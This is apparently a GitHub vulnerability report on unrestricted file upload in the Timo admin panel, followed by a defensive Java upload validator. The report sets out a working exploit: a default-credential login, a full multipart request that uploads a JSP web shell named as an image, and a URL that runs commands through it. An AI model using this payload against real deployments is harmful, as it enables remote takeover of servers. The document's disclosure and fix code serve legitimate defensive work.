
There is a remote command execution vulnerability in Timo. #6

@WDLegend

Description


[Vulnerability type]
remote command execution

[Exploit]
Start the project with Tomcat:
[screenshot]

Log in as admin using the default account admin/123456:
[screenshot]

Send the following HTTP request:

POST /upload/image HTTP/1.1
Host: localhost:8080
Content-Length: 279
sec-ch-ua: "Chromium";v="105", "Not)A;Brand";v="8"
Accept: application/json, text/javascript, */*; q=0.01
Content-Type: multipart/form-data; boundary=----WebKitFormBoundarycmnNKqG4xKTyH1xG
X-Requested-With: XMLHttpRequest
sec-ch-ua-mobile: ?0
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/105.0.5195.102 Safari/537.36
sec-ch-ua-platform: "Windows"
Origin: http://localhost:8080
Sec-Fetch-Site: same-origin
Sec-Fetch-Mode: cors
Sec-Fetch-Dest: empty
Referer: http://localhost:8080/dev/build
Accept-Encoding: gzip, deflate
Accept-Language: zh-CN,zh;q=0.9
Cookie: Hm_lvt_a4980171086658b20eb2d9b523ae1b7b=1701849099,1701995116; JSESSIONID=bd38c610-5e87-4046-9a18-4489536b2379
Connection: close

------WebKitFormBoundarycmnNKqG4xKTyH1xG
Content-Disposition: form-data; name="image"; filename="JustAPic.jsp"
Content-Type: image/jpeg

  <%
    Process process = Runtime.getRuntime().exec(request.getParameter("cmd"));
   %>

------WebKitFormBoundarycmnNKqG4xKTyH1xG--

Then we get the response:
[screenshot]

Then we can execute arbitrary commands through the uploaded JSP trojan:
http://localhost:8080/upload/images/20240103/16b524e10f8b4dc0aaf0acb139effc8d.jsp?cmd=calc

[screenshot]
There is no filetype restriction in admin/src/main/java/com/linln/admin/system/controller/UploadController.java. Just add some filters to fix this problem.
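The fix the report asks for is a server-side allowlist on the upload handler. The following is an added illustration of what such a check can look like; it is not Timo's code and does not touch UploadController.java. It assumes the handler can hand the validator the client-supplied filename and the raw bytes (for a Spring MultipartFile that would be getOriginalFilename() and getBytes()), and it deliberately ignores the Content-Type header, since the request above shows that header is entirely attacker-controlled. The sample inputs in main() are constructed.

```java
import java.nio.charset.StandardCharsets;
import java.security.SecureRandom;
import java.util.Arrays;
import java.util.Locale;
import java.util.Map;

/** Hypothetical allowlist validator for an image upload endpoint (not Timo's code). */
public final class ImageUploadValidator {

    /** Allowed extensions, each mapped to the magic bytes a genuine file of that type starts with. */
    private static final Map<String, byte[][]> ALLOWED = Map.of(
        "png",  new byte[][] { {(byte) 0x89, 'P', 'N', 'G', 0x0D, 0x0A, 0x1A, 0x0A} },
        "jpg",  new byte[][] { {(byte) 0xFF, (byte) 0xD8, (byte) 0xFF} },
        "jpeg", new byte[][] { {(byte) 0xFF, (byte) 0xD8, (byte) 0xFF} },
        "gif",  new byte[][] { "GIF87a".getBytes(StandardCharsets.US_ASCII),
                               "GIF89a".getBytes(StandardCharsets.US_ASCII) }
    );

    private static final SecureRandom RNG = new SecureRandom();

    /** Either a server-generated storage name or the reason the upload was rejected. */
    public record Decision(boolean accepted, String storedName, String reason) {}

    public static Decision validate(String originalFilename, byte[] content) {
        if (originalFilename == null || content == null || content.length == 0) {
            return new Decision(false, null, "empty upload");
        }
        // Strip any client-supplied directory part; only the last path segment matters.
        String name = originalFilename.replace('\\', '/');
        name = name.substring(name.lastIndexOf('/') + 1);

        int dot = name.lastIndexOf('.');
        if (dot < 0 || dot == name.length() - 1) {
            return new Decision(false, null, "no extension");
        }
        // The LAST extension decides, so "a.jpg.jsp" is judged as ".jsp", not ".jpg".
        String ext = name.substring(dot + 1).toLowerCase(Locale.ROOT);
        byte[][] magics = ALLOWED.get(ext);
        if (magics == null) {
            return new Decision(false, null, "extension not allowed: ." + ext);
        }
        // The declared extension must agree with what the bytes actually are.
        boolean magicOk = false;
        for (byte[] magic : magics) {
            if (content.length >= magic.length
                    && Arrays.equals(Arrays.copyOf(content, magic.length), magic)) {
                magicOk = true;
                break;
            }
        }
        if (!magicOk) {
            return new Decision(false, null, "content does not look like ." + ext);
        }
        // Never reuse the client filename on disk: build the stored name server-side
        // from random bytes plus the allowlisted extension.
        byte[] rnd = new byte[16];
        RNG.nextBytes(rnd);
        StringBuilder sb = new StringBuilder();
        for (byte b : rnd) sb.append(String.format("%02x", b));
        return new Decision(true, sb + "." + ext, null);
    }

    public static void main(String[] args) {
        // Constructed sample inputs for demonstration only.
        byte[] png = {(byte) 0x89, 'P', 'N', 'G', 0x0D, 0x0A, 0x1A, 0x0A, 0, 0, 0, 13};
        byte[] jsp = "<% out.println(1); %>".getBytes(StandardCharsets.UTF_8);

        System.out.println(validate("photo.png", png));      // accepted, random name ending in .png
        System.out.println(validate("JustAPic.jsp", jsp));   // rejected: extension not allowed
        System.out.println(validate("a.jpg.jsp", png));      // rejected: last extension is .jsp
        System.out.println(validate("notes.png", jsp));      // rejected: bytes are not a PNG
    }
}
```

Two points of the design matter beyond the extension check. First, the stored filename is generated by the server, so even a bypass of the allowlist cannot choose the name written under the web root. Second, because Tomcat compiles and runs any .jsp it serves from a deployed webapp, the upload directory should also be served as static content only (or kept outside the webapp entirely), so that a file which slips through is downloaded rather than executed.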
